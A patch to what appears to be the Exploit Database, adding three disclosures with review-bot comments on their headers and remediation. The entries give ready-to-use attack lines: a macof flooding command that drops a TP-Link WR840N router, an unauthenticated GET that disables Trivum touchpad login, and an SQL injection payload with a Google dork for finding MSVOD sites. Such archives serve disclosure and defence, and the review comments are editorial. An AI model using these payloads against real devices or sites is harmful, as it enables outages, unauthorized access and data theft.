From 350bb348ff5b5827eb7401ee3f835127aa55f2bf Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 21 Jul 2018 05:01:50 +0000
Subject: [PATCH] DB: 2018-07-21 3 changes to exploits/shellcodes TP-Link TL-WR840N - Denial of Service WordPress Plugin All In One Favicon 4.6 - Cross-Site Scripting WordPress Plugin All In One Favicon 4.6 - (Authenticated) Cross-Site Scripting MSVOD 10 - 'cid' SQL Injection Touchpad / Trivum WebTouch Setup 2.53 build 13163 - Authentication Bypass
---
 exploits/hardware/dos/45064.txt | 20 +++++++++++++++++
 exploits/hardware/webapps/45063.txt | 33 +++++++++++++++++++++++++++++
 exploits/php/webapps/45062.txt | 11 ++++++++++
 files_exploits.csv | 5 ++++-
 4 files changed, 68 insertions(+), 1 deletion(-)
 create mode 100644 exploits/hardware/dos/45064.txt
 create mode 100644 exploits/hardware/webapps/45063.txt
 create mode 100644 exploits/php/webapps/45062.txt
diff --git a/exploits/hardware/dos/45064.txt b/exploits/hardware/dos/45064.txt
new file mode 100644
index 000000000..208951454
--- /dev/null
+++ b/exploits/hardware/dos/45064.txt
@@ -0,0 +1,20 @@
+# Exploit Title:- TP-Link Wireless N Router WR840N - Buffer Overflow
+# Date:- 2018-07-16
+# Vendor Homepage:- https://www.tp-link.com/
+# Hardware Link:- https://www.amazon.in/TP-LINK-TL-WR840N-300Mbps-Wireless-External/dp/B01A0G1J7Q
+# Version:- TP-Link Wireless N Router WR840N
+# Category:- Hardware
+# Exploit Author:- Aniket Dinda
+# Tested on:- Linux
+# CVE:- CVE-2018-14336
+
+**********************************************************************************************************
+Proof Of Concept:-
+
+1- First connect to this network
+2- Open terminal => And Type "macof -i eth0 -n 10"
+3- Hit Enter
+4- You will see that your Net connection will lost.
+******************************************************************************************************
+Solutions:
+1- You have to Reboot your router .
\ No newline at end of file
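Review bot: The `# Exploit Title:-` line in exploits/hardware/dos/45064.txt calls this a Buffer Overflow, but the steps only show connectivity being lost, and files_exploits.csv in this same patch indexes the file under dos as "TP-Link TL-WR840N - Denial of Service". The header therefore claims more than the entry demonstrates, and I would align it as `# Exploit Title:- TP-Link TL-WR840N - Denial of Service`. The `# Version:-` line only repeats the model name, so a defender cannot tell which firmware or hardware revision was tested; a line such as `# Firmware:- <firmware version tested>` would close that gap. The only remediation listed is a reboot, which restores service without addressing the cause, so the entry should say whether a fixed firmware is known.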
diff --git a/exploits/hardware/webapps/45063.txt b/exploits/hardware/webapps/45063.txt
new file mode 100644
index 000000000..ebef2b77b
--- /dev/null
+++ b/exploits/hardware/webapps/45063.txt
@@ -0,0 +1,33 @@
+# Exploit Title: Touchpad / Trivum WebTouch Setup V9 V2.53 build 13163 - Unauthorized Authentication Reset
+
+# Date: 2018-07-20
+
+# Software Link: https://world.trivum-shop.de
+
+# Version: < 2.56 build 13381 - 12-07-2018
+
+# Category: webapps
+
+# Tested on:
+
+Touchpad / Trivum WebTouch Setup V9 V2.53 build 13163 of Apr 6 2018 09:10:14 (FW 303)
+
+# Exploit Author: vulnc0d3
+
+# Contact: http://twitter.com/HerwonoWr
+
+# CVE: CVE-2018-13862
+
+1. Description
+
+Touchpad / Trivum WebTouch Setup V9 V2.53 build 13163 of Apr 6 2018 09:10:14 (FW 303) before 2.56 build 13381 - 12.07.2018, allow unauthorized remote attackers to reset the authentication via "/xml/system/setAttribute.xml" URL, using GET request to the end-point "?id=0&attr=protectAccess&newValue=0" (successful attack will allow attackers to login without authorization).
+
+2. Proof of Concept
+
+# GET Request
+
+http://target/xml/system/setAttribute.xml?id=0&attr=protectAccess&newValue=0
+
+3. Vendor Changes Log
+
+# http://update.trivum.com/update/tp9-changes.html
\ No newline at end of file
diff --git a/exploits/php/webapps/45062.txt b/exploits/php/webapps/45062.txt
new file mode 100644
index 000000000..44dd2452e
--- /dev/null
+++ b/exploits/php/webapps/45062.txt
@@ -0,0 +1,11 @@
+# Exploit Title: MSVOD V10 ¡V SQL Injection
+# Google Dork: inurl:"images/lists?cid=13"
+# Date: 2018/07/17
+# Exploit Author: Hzllaga
+# Vendor Homepage: http://www.msvod.cc/
+# Version: MSVOD V10
+# CVE : CVE-2018-14418
+#Reference : https://www.wtfsec.org/2583/msvod-v10-sql-injection/
+
+Payload:
+/images/lists?cid=13%20)%20ORDER%20BY%201%20desc,extractvalue(rand(),concat(0x7c,database(),0x7c,user(),0x7c,@@version))%20desc%20--%20
\ No newline at end of file
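Review bot: exploits/hardware/webapps/45063.txt ends at the vendor change-log link and has no remediation section, although its own `# Version: < 2.56 build 13381` line implies where the fix boundary lies. I would add a closing section along the lines of `4. Solution` followed by `Update to 2.56 build 13381 or later (see vendor change log).`, hedged if the author has not confirmed the fixed build. The description says the `protectAccess` attribute is changed through an unauthenticated GET to `/xml/system/setAttribute.xml`. A one-line note that such requests would show up in any proxy or access logs in front of the device would let operators check whether the setting was already tampered with. Separately, the `# Tested on:` value sits on an un-prefixed line after a blank line, unlike every other header field.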
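Review bot: The title line of exploits/php/webapps/45062.txt carries a mis-encoded dash, `MSVOD V10 ¡V SQL Injection`, which will defeat plain-text searches on the header. It should read `# Exploit Title: MSVOD V10 - SQL Injection`, matching the hyphen used in the index row. The file never names the affected parameter in prose, while the files_exploits.csv row in this patch gives it as `'cid'`; a header line such as `# Parameter: cid` would keep the two consistent. No fixed version or vendor advisory is listed, so if none exists the entry should say so, so that operators know to rely on input validation or filtering in front of the application.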
diff --git a/files_exploits.csv b/files_exploits.csv
index 5877ff4e7..67abcdc5d 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6022,6 +6022,7 @@ id,file,description,date,author,type,platform,port
 45059,exploits/multiple/dos/45059.txt,"Google Chrome - Swiftshader Texture Allocation Integer Overflow",2018-07-19,"Google Security Research",dos,multiple,
 45060,exploits/multiple/dos/45060.html,"Google Chrome - Swiftshader Blitting Floating-Point Precision Errors",2018-07-19,"Google Security Research",dos,multiple,
 45061,exploits/multiple/dos/45061.html,"Google Chrome - SwiftShader OpenGL Texture Bindings Reference Count Leak",2018-07-19,"Google Security Research",dos,multiple,
+45064,exploits/hardware/dos/45064.txt,"TP-Link TL-WR840N - Denial of Service",2018-07-20,"Aniket Dinda",dos,hardware,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -39686,6 +39687,8 @@ id,file,description,date,author,type,platform,port
 45049,exploits/php/webapps/45049.txt,"Smart SMS & Email Manager 3.3 - 'contact_type_id' SQL Injection",2018-07-18,AkkuS,webapps,php,80
 45053,exploits/multiple/webapps/45053.txt,"Open-AudIT Community 2.1.1 - Cross-Site Scripting",2018-07-18,"Ranjeet Jaiswal",webapps,multiple,
 45054,exploits/php/webapps/45054.txt,"FTP2FTP 1.0 - Arbitrary File Download",2018-07-18,AkkuS,webapps,php,
-45056,exploits/php/webapps/45056.txt,"WordPress Plugin All In One Favicon 4.6 - Cross-Site Scripting",2018-07-19,"Javier Olmedo",webapps,php,80
+45056,exploits/php/webapps/45056.txt,"WordPress Plugin All In One Favicon 4.6 - (Authenticated) Cross-Site Scripting",2018-07-19,"Javier Olmedo",webapps,php,80
 45055,exploits/php/webapps/45055.py,"Modx Revolution < 2.6.4 - Remote Code Execution",2018-07-18,"Vitalii Rudnykh",webapps,php,
 45057,exploits/php/webapps/45057.txt,"MyBB New Threads Plugin 1.1 - Cross-Site Scripting",2018-07-19,0xB9,webapps,php,80
+45062,exploits/php/webapps/45062.txt,"MSVOD 10 - 'cid' SQL Injection",2018-07-20,Hzllaga,webapps,php,
+45063,exploits/hardware/webapps/45063.txt,"Touchpad / Trivum WebTouch Setup 2.53 build 13163 - Authentication Bypass",2018-07-20,vulnc0d3,webapps,hardware,
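Review bot: The new 45063 row pins its description to the single tested build, `2.53 build 13163`, whereas 45063.txt in this same patch states that versions before 2.56 build 13381 are affected. Someone searching the index to see whether their installed build is covered would likely miss this entry. Other rows in this file already use the range form (`Modx Revolution < 2.6.4`, `Linux Kernel < 2.4.20`), so I would write the description as `"Touchpad / Trivum WebTouch Setup < 2.56 build 13381 - Authentication Bypass"`.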